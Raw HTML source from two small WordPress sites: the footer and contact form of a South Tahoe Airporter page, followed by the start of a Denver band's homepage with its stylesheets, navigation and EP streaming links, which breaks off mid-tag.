155.324-155.325 155.326-.004.005c-1.671 1.673-2.88 3.627-3.657 5.707-2.124 5.688-.913 12.341 3.661 16.915l73.374 73.373c4.575 4.574 11.226 5.784 16.915 3.661 2.08-.776 4.035-1.985 5.708-3.656l.005-.005 155.324-155.325 155.324 155.325.006.004c1.674 1.672 3.627 2.881 5.707 3.657 5.689 2.123 12.342.913 16.914-3.661l73.373-73.374c4.574-4.574 5.785-11.227 3.662-16.915-.776-2.08-1.985-4.034-3.657-5.707z"/></svg> </span> </button> </div> <input type="hidden" id="security" name="security" value="98ba084ff3" /><input type="hidden" name="_wp_http_referer" value="/" /><input type="hidden" id="sh_id" name="sh_id" value="413"><input type="hidden" id="p_id" name="p_id" value="121"> <div class="contact-form-message clearfix"></div> </form> </div> </div></div></div><div class="wpb_column vc_column_container vc_col-sm-3"><div class="vc_column-inner "><div class="wpb_wrapper"> </div></div></div> </div></div> </div> <div class="clearboth"></div> </div> <div class="clearboth"></div> </div> </div> <div class="mk-main-wrapper-holder"> <div class="theme-page-wrapper full-layout mk-grid vc_row-fluid"> <div class="theme-content "> <div class="clearboth"></div> <div class="clearboth"></div> </div> <div class="clearboth"></div> </div> </div> </div> <section id="mk-footer-unfold-spacer"></section> <section id="mk-footer" class="" role="contentinfo" itemscope="itemscope" itemtype="https://schema.org/WPFooter" > <div class="footer-wrapper mk-grid"> <div class="mk-padding-wrapper"> <div class="mk-col-1-4"></div> <div class="mk-col-1-4"></div> <div class="mk-col-1-4"></div> <div class="mk-col-1-4"></div> <div class="clearboth"></div> </div> </div> <div id="sub-footer"> <div class=" mk-grid"> <span class="mk-footer-copyright">Copyright All Rights Reserved South Tahoe Airporter © 2016</span> </div> <div class="clearboth"></div> </div> </section> </div> </div> <div class="bottom-corner-btns js-bottom-corner-btns"> <a href="#top-of-page" class="mk-go-top js-smooth-scroll js-bottom-corner-btn js-bottom-corner-btn--back"> <svg class="mk-svg-icon" data-name="mk-icon-chevron-up" data-cacheid="icon-5cdd849f981e0" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1792 1792"><path d="M1683 1331l-166 165q-19 19-45 19t-45-19l-531-531-531 531q-19 19-45 19t-45-19l-166-165q-19-19-19-45.5t19-45.5l742-741q19-19 45-19t45 19l742 741q19 19 19 45.5t-19 45.5z"/></svg></a> <div class="mk-quick-contact-wrapper js-bottom-corner-btn js-bottom-corner-btn--contact"> <a href="#" class="mk-quick-contact-link"><svg class="mk-svg-icon" data-name="mk-icon-envelope" data-cacheid="icon-5cdd849f988a7" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1792 1792"><path d="M1792 710v794q0 66-47 113t-113 47h-1472q-66 0-113-47t-47-113v-794q44 49 101 87 362 246 497 345 57 42 92.5 65.5t94.5 48 110 24.5h2q51 0 110-24.5t94.5-48 92.5-65.5q170-123 498-345 57-39 100-87zm0-294q0 79-49 151t-122 123q-376 261-468 325-10 7-42.5 30.5t-54 38-52 32.5-57.5 27-50 9h-2q-23 0-50-9t-57.5-27-52-32.5-54-38-42.5-30.5q-91-64-262-182.5t-205-142.5q-62-42-117-115.5t-55-136.5q0-78 41.5-130t118.5-52h1472q65 0 112.5 47t47.5 113z"/></svg></a> <div id="mk-quick-contact"> <div class="mk-quick-contact-title">Contact Us</div> <p>We're not around right now. But you can send us an email and we'll get back to you, asap.</p> <form class="mk-contact-form" method="post" novalidate="novalidate"> <input type="text" placeholder="Name*" required="required" id="contact_name" name="contact_name" class="text-input" value="" tabindex="130" /> <input type="email" required="required" placeholder="Email*" id="contact_email" name="contact_email" class="text-input" value="" tabindex="131" /> <textarea placeholder="Message*" required="required" id="contact_content" name="contact_content" class="textarea" tabindex="132"></textarea> <input placeholder="Enter Captcha" type="text" name="captcha" class="captcha-form text-input full" required="required" autocomplete="off" /> <a href="#" class="captcha-change-image">Not readable? Change text.</a> <span class="captcha-image-holder"></span> <br/> <div class="btn-cont"> <button tabindex="133" class="mk-progress-button mk-contact-button shop-flat-btn shop-skin-btn" data-style="move-up"> <span class="mk-progress-button-content">Send</span> <span class="mk-progress"> <span class="mk-progress-inner"></span> </span> <span class="state-success"><svg class="mk-svg-icon" data-name="mk-moon-checkmark" data-cacheid="icon-5cdd849f98bab" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 512 512"><path d="M432 64l-240 240-112-112-80 80 192 192 320-320z"/></svg></span> <span class="state-error"><svg class="mk-svg-icon" data-name="mk-moon-close" data-cacheid="icon-5cdd849f98e2e" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 512 512"><path d="M507.331 411.33l-.006-.005-155.322-155.325 155.322-155.325.006-.005c1.672-1.673 2.881-3.627 3.656-5.708 2.123-5.688.912-12.341-3.662-16.915l-73.373-73.373c-4.574-4.573-11.225-5.783-16.914-3.66-2.08.775-4.035 1.984-5.709 3.655l-.004.005-155.324 155.326-155.324-155.325-.005-.005c-1.673-1.671-3.627-2.88-5.707-3.655-5.69-2.124-12.341-.913-16.915 3.66l-73.374 73.374c-4.574 4.574-5.784 11.226-3.661 16.914.776 2.08 1.985 4.036 3.656 5.708l.005.005 155.325 155.324-155.325 155.326-.004.005c-1.671 1.673-2.88 3.627-3.657 5.707-2.124 5.688-.913 12.341 3.661 16.915l73.374 73.373c4.575 4.574 11.226 5.784 16.915 3.661 2.08-.776 4.035-1.985 5.708-3.656l.005-.005 155.324-155.325 155.324 155.325.006.004c1.674 1.672 3.627 2.881 5.707 3.657 5.689 2.123 12.342.913 16.914-3.661l73.373-73.374c4.574-4.574 5.785-11.227 3.662-16.915-.776-2.08-1.985-4.034-3.657-5.707z"/></svg></span> </button> </div> <input type="hidden" id="security" name="security" value="98ba084ff3" /><input type="hidden" name="_wp_http_referer" value="/" /> <input type="hidden" id="sh_id" name="sh_id" value="15"><input type="hidden" id="p_id" name="p_id" value="2342"> <div class="contact-form-message clearfix"></div> </form> <div class="bottom-arrow"></div> </div> </div></div> <footer id="mk_page_footer"> <script type="text/javascript"> php = { hasAdminbar: false, json: (null != null) ? null : "", jsPath: 'http://southtahoeairporter.com/wp-content/themes/jupiter/assets/js' }; </script><script type='text/javascript' src='http://southtahoeairporter.com/wp-content/plugins/contact-form-7/includes/js/jquery.form.min.js?ver=3.51.0-2014.06.20'></script> <script type='text/javascript'> /* <![CDATA[ */ var _wpcf7 = {"loaderUrl":"http:\/\/southtahoeairporter.com\/wp-content\/plugins\/contact-form-7\/images\/ajax-loader.gif","recaptchaEmpty":"Please verify that you are not a robot.","sending":"Sending ..."}; /* ]]> */ </script> <script type='text/javascript' src='http://southtahoeairporter.com/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=4.4.2'></script> <script type='text/javascript' src='http://southtahoeairporter.com/wp-content/themes/jupiter/assets/js/plugins/wp-enqueue/smoothscroll.js?ver=5.1.7'></script> <script type='text/javascript' src='http://southtahoeairporter.com/wp-includes/js/comment-reply.min.js?ver=4.5.17'></script> <script type='text/javascript'> /* <![CDATA[ */ var ajax_login_object = {"ajaxurl":"http:\/\/southtahoeairporter.com\/wp-admin\/admin-ajax.php","redirecturl":"http:\/\/southtahoeairporter.com\/","loadingmessage":"Sending user info, please wait..."}; /* ]]> */ </script> <script type='text/javascript' src='http://southtahoeairporter.com/wp-content/themes/jupiter/assets/js/core-scripts.js?ver=5.1.7'></script> <script type='text/javascript' src='http://southtahoeairporter.com/wp-includes/js/wp-embed.min.js?ver=4.5.17'></script> <script type='text/javascript' src='http://southtahoeairporter.com/wp-content/plugins/js_composer_theme/assets/js/dist/js_composer_front.min.js?ver=4.12'></script> <script type='text/javascript' src='http://southtahoeairporter.com/wp-content/uploads/mk_assets/components-production.min.js?ver=1552934767'></script> <script type="text/javascript"> </script> <script type="text/javascript"> window.get = {}; window.get.captcha = function(enteredCaptcha) { return jQuery.get(ajaxurl, { action : "mk_validate_captcha_input", captcha: enteredCaptcha }); };</script> <script> // Run this very early after DOM is ready (function ($) { // Prevent browser native behaviour of jumping to anchor // while preserving support for current links (shared across net or internally on page) var loc = window.location, hash = loc.hash; // Detect hashlink and change it's name with !loading appendix if(hash.length && hash.substring(1).length) { var $topLevelSections = $('.vc_row, .mk-main-wrapper-holder, .mk-page-section, #comments'); var $section = $topLevelSections.filter( '#' + hash.substring(1) ); // We smooth scroll only to page section and rows where we define our anchors. // This should prevent conflict with third party plugins relying on hash if( ! $section.length ) return; // Mutate hash for some good reason - crazy jumps of browser. We want really smooth scroll on load // Discard loading state if it already exists in url (multiple refresh) hash = hash.replace( '!loading', '' ); var newUrl = hash + '!loading'; loc.hash = newUrl; } }(jQuery)); </script> </footer> </body> </html>
0
<!DOCTYPE html> <html lang="en-US"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="http://gmpg.org/xfn/11"> <link rel="pingback" href="https://www.wildmountaingreengrass.com/xmlrpc.php"> <title>Wild Mountain &#8211; Denver, CO</title> <link rel='dns-prefetch' href='//maxcdn.bootstrapcdn.com' /> <link rel='dns-prefetch' href='//fonts.googleapis.com' /> <link rel='dns-prefetch' href='//s.w.org' /> <link rel="alternate" type="application/rss+xml" title="Wild Mountain &raquo; Feed" href="https://www.wildmountaingreengrass.com/feed/" /> <link rel="alternate" type="application/rss+xml" title="Wild Mountain &raquo; Comments Feed" href="https://www.wildmountaingreengrass.com/comments/feed/" /> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/www.wildmountaingreengrass.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.9.8"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55358,56760,9792,65039],[55358,56760,8203,9792,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='fl-builder-layout-156-css' href='https://www.wildmountaingreengrass.com/wp-content/uploads/bb-plugin/cache/156-layout.css?ver=8603cd3450bb0c4f67c011a7b3d8a8b2' type='text/css' media='all' /> <link rel='stylesheet' id='contact-form-7-css' href='https://www.wildmountaingreengrass.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.0.5' type='text/css' media='all' /> <link rel='stylesheet' id='email-before-download-css' href='https://www.wildmountaingreengrass.com/wp-content/plugins/email-before-download/public/css/email-before-download-public.css?ver=5.1.9' type='text/css' media='all' /> <link rel='stylesheet' id='es-widget-css-css' href='https://www.wildmountaingreengrass.com/wp-content/plugins/email-subscribers/widget/es-widget.css?ver=4.9.8' type='text/css' media='all' /> <link rel='stylesheet' id='Rich_Web_Video_Slider-css' href='https://www.wildmountaingreengrass.com/wp-content/plugins/slider-video/Style/Rich-Web-Video-Slider-Widget.css?ver=4.9.8' type='text/css' media='all' /> <link rel='stylesheet' id='fontawesomeSl-css-css' href='https://www.wildmountaingreengrass.com/wp-content/plugins/slider-video/Style/richwebicons.css?ver=4.9.8' type='text/css' media='all' /> <link rel='stylesheet' id='dlm-frontend-css' href='https://www.wildmountaingreengrass.com/wp-content/plugins/download-monitor/assets/css/frontend.css?ver=4.9.8' type='text/css' media='all' /> <link rel='stylesheet' id='bootstrap-css' href='https://www.wildmountaingreengrass.com/wp-content/themes/rock-n-rolla/assets/css/bootstrap.css?ver=4.9.8' type='text/css' media='all' /> <link rel='stylesheet' id='flexslider-css' href='https://www.wildmountaingreengrass.com/wp-content/themes/rock-n-rolla/assets/css/flexslider.css?ver=4.9.8' type='text/css' media='all' /> <link rel='stylesheet' id='font-awesome-css' href='https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css?ver=2.1.4.5' type='text/css' media='all' /> <link rel='stylesheet' id='prettyPhoto-css' href='https://www.wildmountaingreengrass.com/wp-content/themes/rock-n-rolla/assets/css/prettyPhoto.css?ver=4.9.8' type='text/css' media='all' /> <link rel='stylesheet' id='rock-n-rolla-google-fonts-css' href='//fonts.googleapis.com/css?family=Lato%3A400%2C300%2C700%2C400italic%2C900%7COswald%3A400%2C700&#038;ver=4.9.8' type='text/css' media='all' /> <!--[if IE]> <link rel='stylesheet' id='rock-n-rolla-ie-style-css' href='https://www.wildmountaingreengrass.com/wp-content/themes/rock-n-rolla/assets/css/ie.css?ver=4.9.8' type='text/css' media='all' /> <![endif]--> <link rel='stylesheet' id='rock-n-rolla-style-css' href='https://www.wildmountaingreengrass.com/wp-content/themes/rock-n-rolla/style.css?ver=4.9.8' type='text/css' media='all' /> <link rel='stylesheet' id='wpcw-css' href='https://www.wildmountaingreengrass.com/wp-content/plugins/contact-widgets/assets/css/style.min.css?ver=1.0.1' type='text/css' media='all' /> <script type='text/javascript' src='https://www.wildmountaingreengrass.com/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script> <script type='text/javascript' src='https://www.wildmountaingreengrass.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script> <script type='text/javascript' src='https://www.wildmountaingreengrass.com/wp-content/plugins/gigpress/scripts/gigpress.js?ver=4.9.8'></script> <script type='text/javascript' src='https://www.wildmountaingreengrass.com/wp-includes/js/jquery/ui/core.min.js?ver=1.11.4'></script> <script type='text/javascript'> /* <![CDATA[ */ var object = {"ajaxurl":"https:\/\/www.wildmountaingreengrass.com\/wp-admin\/admin-ajax.php"}; /* ]]> */ </script> <script type='text/javascript' src='https://www.wildmountaingreengrass.com/wp-content/plugins/slider-video/Scripts/Rich-Web-Video-Slider-Widget.js?ver=4.9.8'></script> <script type='text/javascript' src='https://www.wildmountaingreengrass.com/wp-content/themes/rock-n-rolla/js/bootstrap.js?ver=4.9.8'></script> <script type='text/javascript' src='https://www.wildmountaingreengrass.com/wp-content/themes/rock-n-rolla/js/jquery.prettyPhoto.js?ver=4.9.8'></script> <script type='text/javascript' src='https://www.wildmountaingreengrass.com/wp-content/themes/rock-n-rolla/js/jquery.flexslider.js?ver=4.9.8'></script> <script type='text/javascript'> /* <![CDATA[ */ var slider_speed = {"vars":"6000"}; var carousel_speed = {"vars":"6000"}; /* ]]> */ </script> <script type='text/javascript' src='https://www.wildmountaingreengrass.com/wp-content/themes/rock-n-rolla/js/custom.js?ver=4.9.8'></script> <!--[if lt IE 9]> <script type='text/javascript' src='https://www.wildmountaingreengrass.com/wp-content/themes/rock-n-rolla/js/ie-responsive.min.js?ver=4.9.8'></script> <![endif]--> <!--[if lt IE 9]> <script type='text/javascript' src='https://www.wildmountaingreengrass.com/wp-content/themes/rock-n-rolla/js/html5shiv.min.js?ver=4.9.8'></script> <![endif]--> <link rel='https://api.w.org/' href='https://www.wildmountaingreengrass.com/wp-json/' /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://www.wildmountaingreengrass.com/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://www.wildmountaingreengrass.com/wp-includes/wlwmanifest.xml" /> <meta name="generator" content="WordPress 4.9.8" /> <link rel="canonical" href="https://www.wildmountaingreengrass.com/" /> <link rel='shortlink' href='https://www.wildmountaingreengrass.com/' /> <link rel="alternate" type="application/json+oembed" href="https://www.wildmountaingreengrass.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.wildmountaingreengrass.com%2F" /> <link rel="alternate" type="text/xml+oembed" href="https://www.wildmountaingreengrass.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.wildmountaingreengrass.com%2F&#038;format=xml" /> <link href="https://www.wildmountaingreengrass.com/?feed=gigpress" rel="alternate" type="application/rss+xml" title="Upcoming shows" /> <style id="color-settings"> a, .entry-title a, .widget ul li a:hover, .pagination, .read_more:hover, .site-info a:hover {color:#1d7f07} .widget-title:before, .section-label:before{ border-bottom:solid 4px #1d7f07} .read_more, .read_more:hover{ border:solid 2px #1d7f07!important} .gallery-item a img:hover{ border:solid 5px #1d7f07} .read_more,.main-navigation li:hover > a, .main-navigation li.focus > a, button, input[type="button"], input[type="reset"], input[type="submit"], .social-meidia li a:hover, #search-icon i:hover, .next .fa-chevron-right, .prev .fa-chevron-left, .tagcloud a, .comment-reply-link, .main-navigation .current_page_item > a, .main-navigation .current-menu-item > a, .main-navigation .current_page_ancestor > a, .main-navigation .current-menu-ancestor > a{background:#1d7f07} </style> <style type="text/css"> .site-title a, .site-description { color: #ffffff; } </style> <style type="text/css" id="custom-background-css"> body.custom-background { background-image: url("https://www.wildmountaingreengrass.com/wp-content/uploads/2017/10/Wild-Mountain-Greengrass.png"); background-position: left top; background-size: contain; background-repeat: no-repeat; background-attachment: fixed; } </style> <link rel="icon" href="https://www.wildmountaingreengrass.com/wp-content/uploads/2017/10/cropped-mountainFoot-2-32x32.png" sizes="32x32" /> <link rel="icon" href="https://www.wildmountaingreengrass.com/wp-content/uploads/2017/10/cropped-mountainFoot-2-192x192.png" sizes="192x192" /> <link rel="apple-touch-icon-precomposed" href="https://www.wildmountaingreengrass.com/wp-content/uploads/2017/10/cropped-mountainFoot-2-180x180.png" /> <meta name="msapplication-TileImage" content="https://www.wildmountaingreengrass.com/wp-content/uploads/2017/10/cropped-mountainFoot-2-270x270.png" /> </head> <body class="home page-template-default page page-id-156 custom-background fl-builder"> <div id="page" class="site"> <a class="skip-link screen-reader-text" href="#main">Skip to content</a> <header id="masthead" class="site-header" role="banner"> <div class="search-form-wrapper"> <div class="container"> <div class="search-form-coantainer"> <form method="get" class="searchform" action="https://www.wildmountaingreengrass.com/"> <label> <input type="text" class="search-top" placeholder="Search here.." value="" name="s" title="Search for:" /> </label> <input type="submit" class="Search" value="Search" /> </form> </div> </div> </div> <div class="header-wrapper"> <div class="header-top"> <div class="container"> <div class="row"> <div class="col-md-6"> <div class="site-branding"> <h1 class="site-title"><a href="https://www.wildmountaingreengrass.com/" rel="home">Wild Mountain</a></h1> <p class="site-description">Denver, CO</p> </div><!-- .site-branding --> </div> <div class="col-md-6"> <ul id="mobile-icon" class="social-media"> <li><a href="https://www.facebook.com/wildmountaingreengrass/" title="Facebook"><i class="fa fa-facebook"></i></a></li> <li><a href="https://twitter.com/wildmountaingr1" title="Twitter"><i class="fa fa-twitter"></i></a></li> <li><a href="https://www.youtube.com/channel/UC1HqltuUQcSQzA2t0j2yG0Q" title="Youtube"><i class="fa fa-youtube"></i></a></li> <li><a href="https://www.instagram.com/wildmountaingreengrass" title="Instagram"><i class="fa fa-instagram"></i></a></li> <li><a href="mailto:[email protected]" title="Email"><i class="fa fa-envelope"></i></a></li> <li> <div class="search-icon-wrapper"> <span id="search-icon"><i class="fa fa-search"></i></span> </div> </li> </ul> <div id="show-icons"> <i class="fa fa-angle-down"></i> <i class="fa fa-angle-up hide-icons"></i> </div> </div> </div> </div> </div> <div class="header-bottom"> <div class="container"> <nav id="site-navigation" class="main-navigation" role="navigation"> <button class="menu-toggle" aria-controls="primary-menu" aria-expanded="false"><i class="fa fa-bars"></i></button> <div class="menu-primary-menu-container"><ul id="primary-menu" class="menu"><li id="menu-item-170" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home current-menu-item page_item page-item-156 current_page_item menu-item-170"><a href="https://www.wildmountaingreengrass.com/">Home</a></li> <li id="menu-item-172" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-172"><a href="https://www.wildmountaingreengrass.com/about/">About Us</a></li> <li id="menu-item-381" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-381"><a href="https://www.wildmountaingreengrass.com/events/">Events</a></li> <li id="menu-item-382" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-382"><a href="https://www.wildmountaingreengrass.com/video/">Video</a></li> <li id="menu-item-383" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-383"><a href="https://www.wildmountaingreengrass.com/music/">Music</a></li> <li id="menu-item-171" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-171"><a href="https://www.wildmountaingreengrass.com/contact/">Contact Us</a></li> <li id="menu-item-380" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-380"><a href="https://www.wildmountaingreengrass.com/epk/">EPK</a></li> </ul></div> </nav><!-- #site-navigation --> </div> </div> </div> </header><!-- #masthead --> <section id="home-slider"> </section> <div id="content" class="site-content"> <div class="header-container"> <header class="entry-header" > <div class="black-overlay"> <h1 class="entry-title">Home</h1> </div> </header><!-- .entry-header --> </div> <div class="container"> <div id="primary" class="content-area"> <div class="row"> <div class="col-md-8"> <main id="main" class="site-main" role="main"> <article id="post-156" class="post-156 page type-page status-publish hentry"> <div class="entry-content"> <div class="fl-builder-content fl-builder-content-156 fl-builder-content-primary" data-post-id="156"><div id="expect" class="fl-row fl-row-full-width fl-row-bg-none fl-node-57571353380c6" data-node="57571353380c6"> <div class="fl-row-content-wrap"> <div class="fl-row-content fl-row-fixed-width fl-node-content"> <div class="fl-col-group fl-node-5b6882428db04" data-node="5b6882428db04"> <div class="fl-col fl-node-5b6882428de70" data-node="5b6882428de70"> <div class="fl-col-content fl-node-content"> <div class="fl-module fl-module-rich-text fl-node-5c01e3f24b5c6" data-node="5c01e3f24b5c6"> <div class="fl-module-content fl-node-content"> <div class="fl-rich-text"> <h2>Wild Mountain's New EP Country<span style="color: #ffffff;"><strong> </strong></span></h2> </div> </div> </div> <div class="fl-module fl-module-rich-text fl-node-5c01f4036ce95" data-node="5c01f4036ce95"> <div class="fl-module-content fl-node-content"> <div class="fl-rich-text"> <p><span style="font-size: 20px;"><a href="https://www.wildmountaingreengrass.com/free-download-of-satisfy-this-girl/">Sign Up</a>   for a free download of Satisfy This Girl</span></p> </div> </div> </div> <div class="fl-module fl-module-photo fl-node-5c01e453dfde8" data-node="5c01e453dfde8"> <div class="fl-module-content fl-node-content"> <div class="fl-photo fl-photo-align-center" itemscope itemtype="https://schema.org/ImageObject"> <div class="fl-photo-content fl-photo-img-png"> <img class="fl-photo-img wp-image-632 size-full" src="https://www.wildmountaingreengrass.com/wp-content/uploads/2018/11/WM_EP.png" alt="WM_EP" itemprop="image" height="1425" width="1425" title="WM_EP" srcset="https://www.wildmountaingreengrass.com/wp-content/uploads/2018/11/WM_EP.png 1425w, https://www.wildmountaingreengrass.com/wp-content/uploads/2018/11/WM_EP-150x150.png 150w, https://www.wildmountaingreengrass.com/wp-content/uploads/2018/11/WM_EP-300x300.png 300w, https://www.wildmountaingreengrass.com/wp-content/uploads/2018/11/WM_EP-768x768.png 768w, https://www.wildmountaingreengrass.com/wp-content/uploads/2018/11/WM_EP-1024x1024.png 1024w, https://www.wildmountaingreengrass.com/wp-content/uploads/2018/11/WM_EP-650x650.png 650w, https://www.wildmountaingreengrass.com/wp-content/uploads/2018/11/WM_EP-350x350.png 350w, https://www.wildmountaingreengrass.com/wp-content/uploads/2018/11/WM_EP-90x90.png 90w" sizes="(max-width: 1425px) 100vw, 1425px" /> </div> </div> </div> </div> </div> </div> </div> <div class="fl-col-group fl-node-5c414a3e353b5" data-node="5c414a3e353b5"> <div class="fl-col fl-node-5c414a3e35706" data-node="5c414a3e35706"> <div class="fl-col-content fl-node-content"> <div class="fl-module fl-module-rich-text fl-node-5c414a379fb7b" data-node="5c414a379fb7b"> <div class="fl-module-content fl-node-content"> <div class="fl-rich-text"> <p><span style="font-size: 36px;">Listen to Wild Mountain Country</span></p> </div> </div> </div> </div> </div> </div> <div class="fl-col-group fl-node-5c414a550a5d3" data-node="5c414a550a5d3"> <div class="fl-col fl-node-5c414a550aca2 fl-col-small" data-node="5c414a550aca2"> <div class="fl-col-content fl-node-content"> <div class="fl-module fl-module-callout fl-node-5c414a49ae6e8" data-node="5c414a49ae6e8"> <div class="fl-module-content fl-node-content"> <div class="fl-callout fl-callout-left"> <div class="fl-callout-content"> <h3 class="fl-callout-title"><span><a href="https://open.spotify.com/album/11aTiOzQKuskk7Cc3rPwSD" target="_blank" class="fl-callout-title-link fl-callout-title-text">Spotify</a></span></h3> <div class="fl-callout-text-wrap"> <div class="fl-callout-text"><p>Wild Mountain available on Spotify.</p> <p>&nbsp;</p> </div><a href="https://open.spotify.com/album/11aTiOzQKuskk7Cc3rPwSD" target="_blank" class="fl-callout-cta-link">Listen...</a> </div> </div> </div> </div> </div> </div> </div> <div class="fl-col fl-node-5c414a728448c fl-col-small" data-node="5c414a728448c"> <div class="fl-col-content fl-node-content"> <div class="fl-module fl-module-callout fl-node-5c414a6b7a8c6" data-node="5c414a6b7a8c6"> <div class="fl-module-content fl-node-content"> <div class="fl-callout fl-callout-left"> <div class="fl-callout-content"> <h3 class="fl-callout-title"><span><a href="https://music.amazon.com/albums/B07M93NFMV?tab=CATALOG&ref=dm_wcp_albm_link_pr_s" target="_blank" class="fl-callout-title-link fl-callout-title-text">Amazon</a></span></h3> <div class="fl-callout-text-wrap"> <div class="fl-callout-text"><p>Wild Mountain on Amazon</p> <p>&nbsp;</p> </div><a href="https://music.amazon.com/albums/B07M93NFMV?tab=CATALOG&ref=dm_wcp_albm_link_pr_s" target="_blank" class="fl-callout-cta-link">Listen...</a> </div> </div> </div> </div> </div> </div> </div> </div> <div class="fl-col-group fl-node-5c01f741d3d81" data-node="5c01f741d3d81"> <div class="fl-col fl-node-5c01f741d4063" data-node="5c01f741d4063"> <div class="fl-col-content fl-node-content"> <div class="fl-module fl-module-photo fl-node-5c01f78d460ab" data-node="5c01f78d460ab"> <div class="fl-module-content fl-node-content"> <div class="fl-photo fl-photo-align-center" itemscope itemtype="https://schema.org/ImageObject"> <div class="fl-photo-content fl-photo-img-png"> <img class="fl-photo-img wp-image-340 size-full" src="https://www.wildmountaingreengrass.com/wp-content/uploads/2017/10/frontCover.png" alt="Wild Mountain Greengrass" itemprop="image" height="1564" width="1708" title="Wild Mountain Greengrass" srcset="https://www.wildmountaingreengrass.com/wp-content/uploads/2017/10/frontCover.png 1708w, https://www.wildmountaingreengrass.com/wp-content/uploads/2017/10/frontCover-300x275.png 300w, https://www.wildmountaingreengrass.com/wp-content/uploads/2017/10/frontCover-768x703.png 768w, https://www.wildmountaingreengrass.com/wp-content/uploads/2017/10/frontCover-1024x938.png 1024w, https://www.wildmountaingreengrass.com/wp-content/uploads/2017/10/frontCover-1600x1465.png 1600w" sizes="(max-width: 1708px) 100vw, 1708px" /> </div> </div> </div> </div> </div> </div> </div> <div class="fl-col-group fl-node-5c01f7cad425c" data-node="5c01f7cad425c"> <div class="fl-col fl-node-5c01f7cad455d" data-node="5c01f7cad455d"> <div class="fl-col-content fl-node-content"> <div class="fl-module fl-module-rich-text fl-node-5c01f741d3ba8" data-node="5c01f741d3ba8"> <div class="fl-module-content fl-node-content"> <div class="fl-rich-text"> <p><span style="font-size: 36px;">Listen to Wild Mountain Greengrass</span></p> </div> </div> </div> </div> </div> </div> <div class="fl-col-group fl-node-5757135338174" data-node="5757135338174"> <div class="fl-col fl-node-57571353382cf fl-col-small" data-node="57571353382cf"> <div class="fl-col-content fl-node-content"> <div class="fl-module fl-module-callout fl-node-59ed6365cc136" data-node="59ed6365cc136"> <div class="fl-module-content fl-node-content"> <div class="fl-callout fl-callout-left"> <div class="fl-callout-content"> <h3 class="fl-callout-title"><span><a href="https://open.spotify.com/album/3UP5tDPUTRsHr0b37FyGPn" target="_blank" class="fl-callout-title-link fl-callout-title-text">Spotify</a></span></h3> <div class="fl-callout-text-wrap"> <div class="fl-callout-text"><p>Wild Mountain available on Spotify.</p> <p>&nbsp;</p> </div><a href="https://open.spotify.com/album/3UP5tDPUTRsHr0b37FyGPn" target="_blank" class="fl-callout-cta-link">Listen...</a> </div> </div> </div> </div> </div> </div> </div> <div class="fl-col fl-node-575713533837c fl-col-small" data-node="575713533837c"> <div class="fl-col-content fl-node-content"> <div class="fl-module fl-module-callout fl-node-5b6a1d26e787b" data-node="5b6a1d26e787b"> <div class="fl-module-content fl-node-content"> <div class="fl-callout fl-callout-left"> <div class="fl-callout-content"> <h3 class="fl-callout-title"><span><a href="https://www.amazon.com/gp/product/B0733P9WBT/ref=dm_ws_sp_ps_dp" 